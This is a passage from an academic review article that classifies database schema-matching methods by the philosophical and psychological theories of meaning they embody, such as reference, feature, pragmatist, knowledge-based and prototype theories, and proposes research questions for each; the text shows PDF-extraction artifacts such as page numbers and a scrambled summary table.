Empirical Evaluation of Schema-Matching Methods Schema-matching methods are evaluated by comparing their matching results to a set of reference matches (Berlin & Motro, 2002; W. W. Cohen, 2000; Doan et al., 2003; Kang & Naughton, 2003; Lerner, 2000; Noy & Musen, 2003; Palopoli et al., 2003; Su & Gulla, 2006; Su et al., 2004; Yeh et al., 2003; Zhao & Ram, 2004). Performance is assessed in terms of precision (the proportion of matches found by the method that are in the set of reference matches) and recall (the proportion of reference matches found by the method). Only half of the surveyed schema-matching methods have been subjected to experimental evaluation. Reference matches were established either by a single domain expert (Chua et al., 2003; Yeh et al., 2003) or the researchers themselves (Berlin & Motro, 2001, 2002; Doan et al., 2001; Doan et al., 2003; Doan, Madhavan, Domingos, & Halevy, 2002; Zhao & Ram, 2004), or there is no mention about how they were established (Bergamaschi, Castano, Vincini, & Beneventano, 2001; Bright et al., 1994; Castano et al., 2001; W. W. Cohen, 1998, 2000; Noy & Musen, 2001, 2003). Only Melnik et al. (2002), Palopoli et al. (2003), and Su and Gulla (2006) report the use of multiple participants to establish reference matches. These experimental evaluations involving human-based reference matches also do not report the specific task context that those participants were asked to assume when determining the matches, if any. By establishing the reference matches without explicating the theories of meaning held by participants or researchers, these studies are unable to account for potential variations of theories of meaning held by the humans that establish the reference matches. Because of these validity issues that surround the establishment of reference matches, the theory of meaning embodied in the method may not be the same as the theory of meaning held by the human participants who establish the reference matches.
Hence, a method’s performance measures may not be indicative of the true performance of the method, but may simply reflect a mismatch between theories of meaning. Not knowing whether observed performance is the result of problems with the matching method or problems with establishing the reference matches impairs further improvement of the method. Empirical evaluations of some of the existing schema-matching methods can provide indicative information about the theories of meaning that are used by database integrators. As these evaluations compare the method’s performance to a set of reference matches established by humans, and therefore embody human theories of meaning, the evaluation results can also be seen as statements about human construction of meaning. However, these are not systematic empirical studies guided by theory or designed to answer the more general research questions raised in the next section, but are limited and specific to a particular method. Empirical results are discussed further in connection with specific theories of meaning later. To summarize this section, without knowledge of the theories of meaning held by humans, the respective merits and drawbacks of existing schema-matching methods are difficult to evaluate. Identifying and explicating users’ theories of meaning allow the development or selection of appropriate methods that conform to users’ theories of meaning. This identification and explication, in turn, can make the performance of the method more predictable and its matching results more likely to be accepted by the user.
A THEORETICAL FOUNDATION FOR SCHEMA MATCHING Previously, the article argued for the importance of identifying and explicating theories of meaning. Then it introduced and described the main characteristics of existing schema-matching methods. In this section, we introduce theories of meaning
291
292 Two terms have the same meaning if their use is intended to have the same result (e.g., two speech acts have the same illocutionary force and propositional content). Two terms have the same meaning if they are embedded in the same network of semantic relationships to others within a coherent theory.
Knowledge (networks of beliefs or causal networks)
Opposites and Analogs
Prototypes
Two terms have the same meaning if they have the same prototypes and distance metrics.
Two terms have the same meaning if they have the same opposites. Autoplex, SEMINT
Kang & Naughton (2003), GLUE, ATBE, ARTEMIS, ONION, Anchor-PROMPT, Similarity Flooding, DIKE, Yeh et al. (2003)
Two propositions have the same meaning if they are true under the same circumstances.
Frege, Russell
Sense, Intension, & Features
Two terms have the same meaning if their use results in the same outcome.
Biskup & Embley (2003), Chua et al. (2003), autoplex, automatch, SEMINT, SSM, Bertino et al. (2004), Larson et al. (1989), DIKE, TESS
Two terms have the same meaning if they can be characterized by the same features.
Frege, Russell, Tarski
Biskup & Embley (2003), Kang & Naughton (2003), WHIRL, Chua et al. (2003), automatch, autoplex, SEMINT, iMapper, GLUE
Two terms have the same meaning if they denote the same object or event in the world.
Reference (correspondence)
Existing Schema-Matching Techniques
Meaning
Prominent Proponents
Meaning as
Theories of Meaning in Schema Matching
Table 2. Positioning existing research in schema matching
Theories of Meaning in Schema Matching
from reference disciplines with long traditions in analyzing and defining the concept of meaning: philosophy, psychology, and cognition. For each theory, we discuss how it can be applied to schema matching and identify those schema-matching methods that make use of it. We also raise new research opportunities and pose research questions based on each theory of meaning. While schema-matching methods have traditionally been classified by the type of information they employ (e.g., Batini et al., 1986; Rahm & Bernstein, 2001), this article extends that classification framework with the additional dimension of the theory of meaning. A summary of the positioning of existing theories is given in Table 2. The theories of meaning cannot be categorized by reference discipline as many theories are discussed in more than one. For example, the feature theory of meaning was originally proposed in philosophy (e.g., Russell, 1905, 1956). Based on research in psychology (e.g., Hirsh-Pasek, Reeves, & Golinkoff, 1993), later philosophers adopted a knowledge-based theory of meaning (Kripke, 1980; Putnam, 1975), which subsequently became the foundation for research efforts in cognition (Sowa, 1984). The theories are discussed in the approximate chronological order of their introduction in the reference disciplines. The number of theories of meaning developed during the long history of the reference disciplines is likely as large as the number of their proponents. Consequently, this article can only present the most influential theories. Finer distinctions within the theories are omitted. The article also excludes theories that, while prominent, do not appear operationalizable for use in schema-matching methods. Two prominent theories are excluded by this criterion. First, the theory of meaning as intersubjective understanding (terms have the same meaning if two social actors agree that they have the same meaning; Habermas, 1979, 1981; Toulmin, 1958) suggests a specifically human interpretation of what meaning is. Second, the theory of meaning as metaphor (terms have
the same meaning if they can be described by the same metaphor; Ricoeur, 1976, 1977, 1978) relies on the concept of metaphors, which is an intrinsically human construction. The theories are discussed here, and in the reference disciplines, in isolation. However, this does not preclude the possibility that humans hold and use a combination of theories, or use different theories for different purposes. In fact, the use of multiple theories is an empirical research question that is taken up again in later.
Reference Theory of Meaning According to the reference theory of meaning, the meaning of a term is what the term refers to in an extralinguistic domain, that is, outside of language (Russell, 1905; Strawson, 1950). For example, the meaning of the term product is the set of all physical products within a given domain.
Application to Schema Matching When considering the matching of schema-level elements, the reference theory is applied by instance-based matching methods. For example, the term product on the schema level refers to the instances in the Product table and its meaning is the set of these instances. Hence, instance-based matchers implicitly adopt this theory of meaning for matching schema-level elements such as tables or fields (e.g., Doan et al., 2003). The reference theory of meaning is difficult to apply to the matching of instances in database systems as the instances in the database often refer to physical objects, which are not accessible for processing by software. For example, the instance of a product with serial number 123 refers to a physical thing that is not itself in the database. However, in situations where the referents are computational entities, such as electronic documents, Web pages, images, and so forth, these referents may themselves be stored in the database and thus are available to a schema-matching system. For
293
Theories of Meaning in Schema Matching
example, documents may be stored in a database and be classified by some characteristic values. The meaning of each of these values is the set of external documents to which it refers (or in which it occurs). An initial effort in this direction is the iMapper ontology matching tool (Su, Brasethvik, & Hakkarainen, 2003; Su & Gulla, 2004, 2006; Su et al., 2004).
Research Opportunities Despite its implicit adoption by schema-level matchers, many questions remain unanswered. To what degree does the number of common instances influence similarity in perceived meaning? For example, is similarity of meaning linear in the number of common instances? Other questions concern the aggregation of instance information to make the problem computationally feasible. What are appropriate and useful aggregate measures? For example, Berlin and Motro (2002) aggregate instance information to the frequency of values, mutual information values, and so on. W. W. Cohen (2000) also aggregates instance information to the frequency of values, while Chua et al. (2003) do not aggregate but instead use statistical means such as regression to determine the similarity of instances. While computationally more efficient, aggregation always involves loss of information. Research opportunities exist in investigating appropriate aggregation, or, equivalently, acceptable information loss and its influence on human-perceived similarity of meanings. When applying the reference theory of meaning for the matching of instances, as done in the iMapper method (Su et al., 2003; Su & Gulla, 2004, 2006; Su et al., 2004) by means of informationretrieval techniques, other questions arise. For example, text-mining approaches characterize documents by computing an occurrence vector for terms and seek to determine the meaning of terms by the set of documents referring to them. What are appropriate, feasible, and relevant characteristics of external documents for schema
294
matching? Which words, terms, or other metadata adequately characterize an external file as judged by humans? Should all terms be used, or are some more important than others? Some of these questions have been implicitly addressed by the empirical evaluations of existing schema-matching methods. Because the method’s performance is evaluated relative to a set of reference matches established by humans, the results can be interpreted as being indicative about the construction of meaning by humans. The empirical evaluation of the Automatch method, an instance-based matcher, compares three ways of determining relevant characteristics (mutual information, information gain, and likelihood ratio) and shows no substantial performance differences on reference matches established by humans (Berlin & Motro, 2002). This lack of differences may indicate that distinctions about which values are relevant do not affect the way in which humans construe similarity of meaning and are, therefore, not part of human theories of meaning. However, this study only examined three specific characteristics, so that the above question about appropriate and useful aggregate measures is, to a large extent, still unanswered. In a performance comparison that added synonymy relationships from WordNet to the information-retrieval algorithm in the iMapper method, no increase in precision or recall was observed (Su & Gulla, 2006). This lack of significant results may indicate that humans prefer a reference theory of meaning over one that is based on synonymy (i.e., substitutability in use) when instance information is available. This preference for a reference theory of meaning is compatible with that found by Palopoli et al. (2003). In their DIKE method, synonymy relationships are assigned probabilities or certainties. These were varied in the experimental study, but the matching result showed little change, further indicating that synonymy may not be an important determinant of meaning.
Theories of Meaning in Schema Matching
Su and Gulla (2006) also varied the contribution of the feature vectors of subconcepts and related concepts in their study and found little performance difference. This lack of difference may indicate that meaning is created mainly based on the instances of a concept itself, without regard for instances of related concepts. While the empirical studies presented here answer some of the raised research questions in a limited way, the reader should keep in mind that the experimental studies described above are limited to specific method implementations and matching contexts. Furthermore, postulating relationships, or the lack thereof, based on the lack of empirical results is problematic. Thus, more systematic, theory-guided studies are required.
Feature Theory of Meaning Meaning as reference is associated with a number of problems, leading Frege (1980) to suggest that the meaning of a word or phrase is its sense instead of its referent. Russell (1905, 1956) further defines this sense as a function of the logical operators, predicates, and referents in a phrase. These philosophical foundations have been taken up as the classical view of meaning in the psychology of language, where a concept is defined by a set of necessary and sufficient attributes. For example, the concept of bird would be defined by its ability to fly, to lay eggs, and to have feathers, wings, two legs, and so forth. This listing of characteristics is also termed a feature-based approach (HirshPasek et al., 1993).
Application to Schema Matching When matching entities or tables (e.g., Gotthard et al., 1992; Hayne & Ram, 1990; Larson et al., 1989), the features are attributes or fields. For example, a database schema may suggest that products are those things that have a ProductID, a
ManufacturingDate, and an optional SellByDate. When matching attributes or fields themselves (e.g., Hayne & Ram; Larson et al.; Li & Clifton, 2000), the features are data types, constraints, and so forth. For example, the field Price is defined as a decimal with three digits that is not null, having a minimum of 10, a maximum of 1,000, and a default of 15. For this example, one can say that Price means all those values that have three decimals, are never null, are always between 10 and 1,000, and have a default of 15. While widely used on the schema level when matching attributes and entities (Gotthard et al., 1992; Hayne & Ram, 1990; Larson et al., 1989; Li & Clifton, 2000; Zhao & Ram, 2004), the feature theory of meaning is not applicable to the instance level. The main difficulty with this approach is that, in practice, entities or attributes are not usually identical but only similar to varying degrees.
Research Opportunities In connection with the feature theory of meaning, research questions include determining to what extent similarities and differences, for example, in data type or constraints, are relevant to the meaning as perceived by human users. For example, is the difference between a float and an integer data type relevant when human users apply this theory of meaning? Under what circumstances does such a difference become relevant? Are some features more important than others? Zhao and Ram (2004) concluded from their study that the relevant feature set differs depending on the problem domain. As another example, do humans focus on differences in data types, or differences in relational constraints? How can the similarity of data types (e.g., between integer and float, and between integer and character) be measured, and do such measures correspond to similarities in perceived meaning?
295
Theories of Meaning in Schema Matching
Truth Theory of Meaning Tarski (1935) argues that the meaning of a phrase is the set of conditions under which it is true. Dummett (1993) moderates this position, suggesting that the meaning of a phrase is the set of conditions and type of evidence under which a sentence can be justifiably claimed to be true, that is, its assertability.
Application to Schema Matching This theory of meaning is applicable only at the instance level as assertions are made only on this level. For example, table Product having an instance Foo amounts to asserting that Foo is a product. Instance-level matchers can apply this theory by noting that the situations in which Foo is a product are exactly those in which Foo is an instance of Product. Hence, the meaning of the assertion that Foo is a product is the set of database states in which Foo is an instance of Product. However, this operationalization of the theory of meaning does not yet appear practical as there is currently no way of characterizing the potentially large collection of database states in which this assertion is made. Nevertheless, mining association rules (Agrawal, Imielinski, & Swami, 1993; Fayyad, Piatetsky-Shapiro, Smyth, & Uthurusamy, 1996; Hipp, Güntzer, & Nakhaeizadeh, 2000) may be useful to extract important co-occurrence information. For example, the states in which Foo is an instance of Product may be characterized by the fact that Bar1 and Bar2 are instances of Part when Foo is an instance of Product. The main value of this theory of meaning to schema matching lies in the matching of instances rather than schema elements, as applied, for example, by the WHIRL method (W. W. Cohen, 1998, 2000). While schema elements are merely terms (e.g., Product), inserting an instance into a
296
table is an assertion (e.g., Foo is a product). When instance-based matchers are used to match schema elements, identification of identical or similar instances is often a prerequisite.
Research Opportunities Only a limited amount of research has been based on the truth theory of meaning. In connection with the truth theory of meaning, research opportunities lie in exploring how to characterize database states using suitable aggregate measures and, based on those characteristics, exploring how similar or identical database states can be identified. For example, characteristics of database states might take the form of frequency distributions of particularly relevant fields or relations (Mannino, Chu, & Sager, 1988), or a set of association rules (Agrawal et al., 1993).
Early Pragmatist Theory of Meaning (Meaning as Effect) The reference and truth theories of meaning are denotational (also called correspondence) theories that suggest that terms (e.g., product) denote (or correspond to) either entities in the world or states of the world. These theories neglect the actual use of terms, which is addressed by pragmatic theories. Early pragmatic theory (Dewey, 1958; Wittgenstein, 1953) focuses on the capacity of words to create intentional effects in the world. The early pragmatist theory is behaviorist in nature; it does not refer to intention but only to the observable effects of the use of the words or sentences. For example, a stop sign is meaningful because of its consequences, and the meaning of the sign is the effect it produces. Consequently, this theory is readily applicable to schema matching. However, no existing schema-matching methods are based on this theory.
Theories of Meaning in Schema Matching
Application to Schema Matching Early pragmatist theory of meaning is applicable to both schema-level and instance-level matching by observing effects of the creation of signs. For example, on the schema level, the effects of inserting instances into the table Product determine the meaning of the term product. One might observe that in one database, upon creation of a new instance of Product, new instances of Component are created. If one observes in a second database that whenever an instance of Article is created, new instances of Part are created, one may be justified in claiming that the meanings of Product and Article and the meanings of Component and Part are similar. On the instance level, the meaning of an instance Foo of table Product is determined by the effects the insertion of the specific instance Foo has. These effects include sequences of database operations that occur after a particular instance is created or changed. Alternatively, or in addition, the application software execution following such assertions could be traced. When, on inserting an instance of Product, one finds that in one application system a production scheduling procedure is executed, and in another system, inserting an instance of Article triggers a production scheduling procedure, one may be justified in concluding that Product matches Article. In summary, this theory is an operationalizable theory of meaning that can be applied to schema matching and can bring additional evidence about database effects to bear on the matching problem.
Research Opportunities Research opportunities exist to explore the kind of effects that are relevant for the creation of meaning. For example, the behavior in the database or application software after an instance is inserted (or updated), for example, Foo, may be observed. This line of research requires identification of a
large number of occurrences of such insert or update actions, and identification of similar sequences of events that follow these actions in the database or software system. Technology to enable monitoring of database transactions, that is, the sequence of insert, update, and select operations, is readily available, for example, by analyzing the transaction or recovery log of databases (e.g., Haerder & Reuter, 1983; Ramakrishnan & Gehrke, 2003). For active databases, user-level logging can be implemented to capture instance operations (e.g., Paton, 1998; Paton & Diaz, 1999). Analysis of such data can make use of association-rule discovery (Agrawal et al., 1993; Fayyad et al., 1996; Hipp et al., 2000) or pattern discovery in sequence data (Ewens & Grant, 2001; Korf, Yandell, & Bedell, 2003; T.-L. J. Wang et al., 1994). Related research includes investigating questions as to what extent the similarity of sequences of effects determines meaning, and how to evaluate the similarity of effect sequences. Other research questions also include the following. What is the relative importance of the effects in the database, the application software, and the real world for determining meaning? Is it more important for human similarity judgment to have similar database operations, or is it more important to have similarity in software application behavior? Are the effects of insert and update operations equally important in creating meaning?
Late Pragmatist Theory of Meaning (Meaning as Intention) Late pragmatist theory (Austin, 1962; Grice, 1989; Searle, 1969) suggests that the meaning of a sentence or utterance is not its actual effect but its intended effect. The creator of a sign or assertion has an intention for himself or herself and others to behave in certain ways. Rather than locating the meaning with the hearer as early pragmatist theory does, late pragmatist theory locates it with the speaker. In contrast to the earlier pragmatist theory, which defined meaning through the
297
Theories of Meaning in Schema Matching
hearer’s interpretation, late pragmatist theory defines it through the speaker’s intention.
Application to Schema Matching The meaning according to the late pragmatist theory of meaning is in the source, not the effects, of data creation and changes. For example, one would ask whether the instances of Product are requests for product development, indications that products are being manufactured, or requests to develop marketing campaigns for products. For example, if one confirms that the majority of insertions into the table Product are done by the applications Marketing and MarketManagement, and insertions into the table Article are done by applications Production and Accounting, one would conclude that Product and Article have dissimilar meanings. In contrast to the early pragmatist theory, which is operationalized by observing the events following a particular database operation, the late pragmatist theory is operationalized by observing the events leading up to a particular database operation. This theory of meaning is, like the early pragmatist theory, readily exploitable by schema-level as well as instance-level matchers. To discover the intention of a sign or statement in the database, for example, product, one can examine what the software application or the user intended by making this statement or creating this sign. Software execution tracing is a mature field (Ball & Larus, 1994; Hamou-Lhdaj & Lethbridge, 2004; Zhang & Gupta, 2005) and can be performed on existing code using aspect-oriented techniques (G. Cohen, 2005). Software execution tracing can be performed at the user-interface level to discover a user’s intended actions (Hilbert & Redmiles, 2000; Sanderson & Fisher, 1994).
Research Opportunities Research in this area is needed to investigate the relative importance of data creation (i.e., insert
298
operations and their sources) and data change (i.e., update operations) in the construction of meaning by humans. Other questions concern the traceability of database effects back to software modules. For example, if the database operations come not from a single software module, but from sets of software modules, how can similarities between such sets be measured in a way that they reflect human similarity judgment? To what extent are the frequencies of database operations from different software modules relevant to the judgment of similarity by human users, for example, as part of weighted measures?
Knowledge-Based Theories of Meaning According to the knowledge theory of meaning, terms acquire their meaning through their positions in an underlying causal theory, that is, a network of propositions relating the terms (Kripke, 1980; Lakatos, 1978; Putnam, 1975; Quine, 1953). The theories and propositions may be about general concerns, such as genetics and physics, or about specific concerns, such as the accounting and production management of a particular business. Networks also form the basis for the closely related coherence theory of truth (Davidson, 1986; Putnam, 1981; Rescher, 1973; Young, 2001), according to which two statements have the same meaning if they occupy similar positions in a network of coherent beliefs rather than causal propositions. Knowledge-based theories of meaning in philosophy have informed knowledgebased theories in psychology (e.g., Gopnik, 2001; Gopnik & Wellman, 1994; Hirsh-Pasek et al., 1993; Keil, Smith, Simons, & Levin, 1998; G. L. Murphy, 2002) and are found in the cognitive sciences in the form of semantic network models of knowledge representation (Collins & Loftus, 1975; Collins & Quillian, 1969) and conceptual graphs (Sowa, 1984, 2000).
Theories of Meaning in Schema Matching
Application to Schema Matching Every schema is a theory or network of beliefs; each consists of a set of terms related by propositions, for example, “Every product consists of components” (Figure 1). Schema-level matchers apply this theory by establishing similarity measures between two such networks. Rather than matching each schema element individually, the entire schema is matched. Once this is done, elements in similar positions in the matched schema may be assumed to have similar or identical meaning. Rahm and Bernstein (2001) have suggested the use of graph isomorphism techniques for this task. While many schema-matching methods have realized the importance of structural information on a local level, for example, by examining incoming and outgoing relationships of an entity (GLUE, ATBE, ARTEMIS, DIKE; Kang & Naughton, 2003; Melnik et al., 2002; Noy & Musen, 2001; Yeh et al., 2003), overall schema similarity has not received much attention in schema matching.
Research Opportunities Research issues in this area should focus on efficient heuristics for graph isomorphism as the problem is computationally hard (Corneil & Gottlieb, 1970; Lueker & Booth, 1979; Ullmann, 1976). Current graph isomorphism algorithms focus on exact matches, while in the context of schema matching, inexact matching is required; no two schemata are identical. What are appropriate measures of graph similarity that reflect human judgments of similarity of meaning? How can existing graph isomorphism techniques be adapted for inexact matching? Applying graph isomorphism also raises more questions. For example, when matching entity-relationship models, what is the relative importance of matches of entity types, attributes, and relationships? What relative contribution do different types of schema elements make to the meaning of a term? The connections between schema elements, that is, the edges of the
graph, are often of multiple types. Thus, a schema can be conceptualized as a set of graphs. For example, entity-relationship models contain graphs spanned by relationship edges, graphs spanned by attribution edges, and graphs spanned by generalization edges. Can approximate isomorphisms for all graphs be found simultaneously? What determines an optimal match in this situation? What is the relative importance of, for example, relationships and generalizations to the meaning of terms constructed by human users? The importance of the knowledge-based theory of meaning is indicated in the experimental evaluation of the similarity flooding method by Melnik et al. (2002). This method implements schema-level matching based on local structural properties and lexical similarity of terms. In a sensitivity analysis, the influence of the lexical similarity was found to have little effect on performance, indicating that structural information is the dominant theory of meaning of these two.
Meaning as Opposition and Analogy According to Saussure (1966), human beings produce meaning by structuring word relations into patterns of contrariness and similarity, or opposition and analogy. Hence, the meaning of a term is defined as its relationship to opposite and analogous terms, that is, by its antonymy and synonymy relationships.
Application to Schema Matching This theory can be exploited both for instancelevel as well as for schema-level matching. On the instance level, it can help to establish similarity between instances or data values. On the schema level, such an approach can help establish similarity between schema elements. Most current research using lexical databases such as WordNet and CyC only makes use of the synonymy relationships (Bergamaschi et al., 2001; Melnik
299
Theories of Meaning in Schema Matching
et al., 2002; Noy & Musen, 2001). However, other relationships between terms, especially antonymy, may also be required to determine meaning, and are available in lexical databases.
Research Opportunities Research questions arise as to the relative importance of these relationships to the similarity of meaning. For example, if two terms are synonymous but not antonymous to the same set of terms, how does this affect their similarity of meaning as judged by human users? How can other relationships, such as hypernymy (broader meaning) and hyponymy (narrower meaning) be exploited for schema-matching applications, and what is their importance to human users? Within hypernymy and hyponymy hierarchies, how can the basic level of categorization (Rosch, 1975) be identified, and is this level more important to human theories of meaning than other levels?
Prototype Theory of Meaning The main limitations of the theory of meaning as sense (feature theory of meaning) are its failure to explain graded membership in categories (e.g., penguins are birds even though they do not fly) and prototypicality effects (e.g., humans judge sparrows to be better examples of birds than penguins). These limitations gave rise to prototype theories (Rosch, 1973, 1975; Rosch & Mervis, 1975), in which the meaning of a term or concept is its (real or imaginary) prototype instance, that is, that instance that possesses most of the typical features. Highly salient features are used by humans to identify instances, but in contrast to feature-based theories, they do not define the concept (Hirsh-Pasek et al., 1993).
ample, a human user might identify prototypical instances of an entity type in one database. When these instances also occur in the second database, one might conclude that the two entity types are similar. For instance, if a prototypical product has length, width, and height of 3x5x10 feet, an instance-level matcher can analyze the occurrence of similar instances more easily than using strategies that require computations over all instances. Prototype instances need not actually exist. Imaginary prototypes, for example, for product, could be derived by finding the mean or median values of attributes Length, Width, and Height individually. While no single product possesses the combination of attribute values of the imaginary prototype, that combination of values defines the meaning of the term product. Instance-based techniques that work with aggregates such as means and medians implicitly apply the prototype theory of meaning (GLUE; Berlin & Motro, 2001; Chua et al., 2003; Kang & Naughton, 2003; Li & Clifton, 2000; Miller et al., 2001).
Research Opportunities While aggregate information is widely used in schema matching, questions as to how prototypes can be identified or computed remain unanswered. Given a particular distribution of instance values, how many prototypes can be identified, and are these prototypes useful when humans make similarity judgments based on them? Can clustering algorithms be used, and can cluster centers serve as prototypes that lead to schema-matching methods compatible with human expectations? How can multimodal value distributions be dealt with?
DISCUSSION Application to Schema Matching The prototype theory of meaning is applicable to instance-based matching methods. For ex-
300
The previous section has introduced theories of meaning as an additional dimension along which to classify schema-matching methods. Table
Theories of Meaning in Schema Matching
2 summarizes the research surveyed here and positions it along this new dimension. While we have discussed the application of specific theories of meaning to schema matching and outlined research questions relevant to those theories, this section discusses the classification of existing methods that was carried out. Table 2 shows that the surveyed schema-matching methods are mainly classified as applications of the reference and feature theories of meaning. Based on this existing research, these two theories of meaning are well understood in schema matching. However, while much has been learned, there is room to further improve the precision and recall rates of schema-matching methods in these categories. Based on the reference and feature theories of meaning, we have outlined empirical research questions to this effect. Fewer existing schema-matching methods are found to apply the knowledge-based theory of meaning. These methods typically apply this theory of meaning locally rather than globally. Hence, we reiterate Rahm and Bernstein’s (2001) call for the use of graph isomorphism research in schema matching in connection with this theory of meaning. Graph isomorphism techniques can be used to identify globally similar schema structures. Table 2 shows that some theories of meaning have not yet been applied to schema matching. Prominent among these are the two pragmatist theories of meaning. We introduced these theories and sketched out possible applications to schema matching. Data about effects and intentions of statements, such as insert and update statements, can bring new information to bear on the problem of identifying the meaning of such statements, and the meaning of terms used in them. As outlined, established methods and tools exist to make use of this information with acceptable computational effort. The theory of meaning as opposites and analogies is another theory that appears to be easily applied to schema matching, yet has not been used. We sketched out what an application
of this theory might look like, and have shown that the necessary information is readily available in dictionaries, thesauri, and ontologies. Finally, the truth theory of meaning has yet to be applied to schema matching. However, in contrast to the pragmatist theories and meaning as opposites and analogies, the discussion shows that it is not easily applicable and that its operationalization requires further research. Filling the gaps and applying these theories of meaning can open up a new, theoretically well-founded direction for future schema-matching research. Examining the multitude of theories of meaning raises one important question: Which of these theories is used by human database integrators and would therefore be most promising for improving schema-matching methods? Current empirical results in psychology support later theories, especially knowledge-based theories, better than earlier theories such as prototype theory. This result might explain why methods that are based on earlier theories have precision and recall results substantially below 100%. However, no systematic study of the contribution of each of these theories in the context of human data-integration behavior has yet been done. Hence, important research questions are as yet unanswered: Do humans use only a single theory of meaning? If so, can they switch theories of meaning depending on context? Why do they switch theories? If they use multiple theories, what are the relative contributions of each theory to a human’s similarity judgment? Also, if they use multiple theories, are the theories independent; that is, is the final similarity judgment a linear function of judgments based on different theories of meaning? Do different types of users apply different theories? For example, do database administrators employ different theories of meaning from business users of a database system? If that were the case, one might expect difficulties in data integration projects. Indicative answers to some of these questions are provided by the empirical evaluations of the existing schema-matching methods. However, these are limited to investi-
301
Theories of Meaning in Schema Matching
gating a particular method and cannot substitute for rigorous, theory-driven investigations that are required to address these questions.
CONCLUSION The novel contributions of this review article is the proposition that theories of meaning, originating in the reference disciplines of philosophy, psychology, and cognitive science, are relevant to IS research in schema matching. We first set out the three aims of this article: to provide a new conceptualization and theoretical foundation for schema matching, to use this foundation for positioning and examining existing research, and to point out avenues and opportunities for future research. To accomplish these aims, the article made three specific and novel contributions. First, it proposed theories of meaning as a possible theoretical foundation. Second, it introduced theories of meaning from well-established reference disciplines and used these to examine existing schema-matching methods, it sketched out how they might be applied, and it raised a number of empirical research questions in connection with each theory. Finally, it discussed the positioning of existing schema-matching research and raised further research questions based on the identified gaps in the application of theories of meaning. The research issues identified show that the proposed conceptualization and theoretical foundation is useful to the advancement of the field. The article is based on the premise that every human being holds a theory of meaning, albeit often implicitly. Hence, the aim of this article is not how to choose an appropriate theory of meaning, but rather to encourage schema-matching researchers to use empirical studies to identify and explicate the theories of meaning held by database integrators so that schema-matching methods can be improved based on theoretical guidance and empirical knowledge.
302
The findings of this article may be applicable beyond the database area. In a broader sense, schema matching is a prerequisite also for ontology alignment on the Semantic Web (Hakimpour & Geppert, 2001; Jeong & Hsu, 2001) and translations between modeling languages via metamodels (Davies, Green, Milton, & Rosemann, 2003; Rosemann & Green, 2000, 2002). The specific implications of the presented theories of meaning for these types of schemata are left for future investigations to explore.
REFERENCES Agrawal, R., Imielinski, T., & Swami, A. (1993). Mining association rules between sets of items in large databases. In Proceedings of the ACM SIGMOD Conference on Management of Data, Washington, DC (pp. 207-216). Austin, J. (1962). How to do things with words. Cambridge, MA: Harvard University Press. Bajaj, A., & Ram, S. (2003). IAIS: A methodology to enable inter-agency information sharing in eGovernment. Journal of Database Management, 14(4), 59. Ball, T., & Larus, J. R. (1994). Optimally profiling and tracing programs. ACM Transactions on Programming Languages and Systems, 16(4), 1319-1360. Batini, C., Lenzerini, M., & Navathe, S. (1986). A comparative analysis of methodologies for database schema integration. ACM Computer Surveys, 18(4), 323-364. Bergamaschi, S., Castano, S., & Vincini, M. (1999). Semantic integration of semistructured and structured data sources. ACM SIGMOD Record, 28(1), 54-59. Bergamaschi, S., Castano, S., Vincini, M., & Beneventano, D. (2001). Semantic integration of
Theories of Meaning in Schema Matching
heterogeneous information sources. Data and Knowledge Engineering, 36, 215-249. Berlin, J., & Motro, M. (2001). Autoplex: Automated discovery of content for virtual databases. In Proceedings of CoopIS 2001 (pp. 108-122). Berlin, J., & Motro, M. (2002). Database schema matching using machine learning with feature selection. In Proceedings of CAISE 2002, Toronto, Ontario, Canada (pp. 452-466). Bertino, E., Guerrini, G., & Mesiti, M. (2004). A matching algorithm for measuring the structural similarity between an XML document and a DTD and its applications. Information Systems, 29, 23-46. Biskup, J., & Convent, B. (1986). A formal view integration method. In Proceedings of the 1986 ACM SIGMOD International Conference on Management of Data, Washington, DC (pp. 398-407). Biskup, J., & Embley, D. W. (2003). Extracting information from heterogeneous information sources using ontologically specified target views. Information Systems, 28, 169-212. Bright, M., Hurson, A., & Pakzad, S. (1994). Automated resolution of semantic heterogeneity in multidatabases. ACM Transactions on Database Systems, 19(2), 212-253. Casanova, M., & Vidal, V. (1983). Towards a sound view integration methodology. In Proceedings of the Second ACM SIGACT-SIGMOD Symposium on Principles of Database Systems (pp. 36-47). Castano, S., & De Antonellis, V. (1999). A schema analysis and reconciliation tool environment for heterogeneous databases. In Proceedings of the IEEE IDEAS’99 International Database Engineering and Applications Symposium, Montreal, Quebec, Canada (pp. 53-62).
Castano, S., De Antonellis, V., & De Capitani di Vimercati, S. (2001). Global viewing of heterogeneous data sources. IEEE Transactions on Knowledge and Data Engineering, 13(2), 277-297. Chua, C. E. H., Chiang, R. H., & Lim, E.-P. (2003). Instance-based attribute identification in database integration. The VLDB Journal, 12(3), 228-243. Cohen, G. (2005). Using bytecode transformation to integrate new features. In R. E. Filman et al. (Eds.), Aspect-oriented software development. Boston: Addison-Wesley. Cohen, W. W. (1998). Integration of heterogeneous databases without common domains using queries based on textual similarity. In Proceedings of the 1998 ACM SIGMOD International Conference on Management of Data (pp. 201-212). Cohen, W. W. (2000). Data integration using similarity joins and a word-based information representation language. ACM Transactions on Information Systems, 18(3), 288-321. Collins, A., & Loftus, E. (1975). A spreading activation theory of semantic processing. Psychological Review, 82, 407-428. Collins, A., & Quillian, M. (1969). Retrieval time from semantic memory. Journal of Verbal Learning and Verbal Behavior, 8, 240-248. Corneil, D., & Gotlieb, C. (1970). An efficient algorithm for graph isomorphism. Journal of the Association for Computing Machinery, 17(1), 51-64. Davidson, D. (1986). A coherence theory of truth and knowledge. In E. LePore (Ed.), Truth and interpretation: Perspectives on the philosophy of Donald Davidson. Oxford, United Kingdom: Basil Blackwell. Davies, I., Green, P., Milton, S., & Rosemann, M. (2003, June 15-17). Using meta models for the
303
Theories of Meaning in Schema Matching
comparison of ontologies. In Proceedings of the Eighth CAiSE/IFIP8.1 International Workshop on Evaluation of Modeling Methods in Systems Analysis and Design (EMMSAD’03), Velden, Austria.
Gopnik, A. (2001). Theories, language and culture. In M. Bowerman & S. C. Levinson (Eds.), Language acquisition and conceptual development (pp. 45-69). Cambridge, United Kingdom: Cambridge University Press.
Dewey, J. (1958). Experience and nature. New York: Dover.
Gopnik, A., & Wellman, H. (1994). The “theory theory.” In L. Hirschfield & S. Gelman (Eds.), Mapping the mind: Domain specificity in culture and cognition (pp. 257-293). New York: Cambridge University Press.
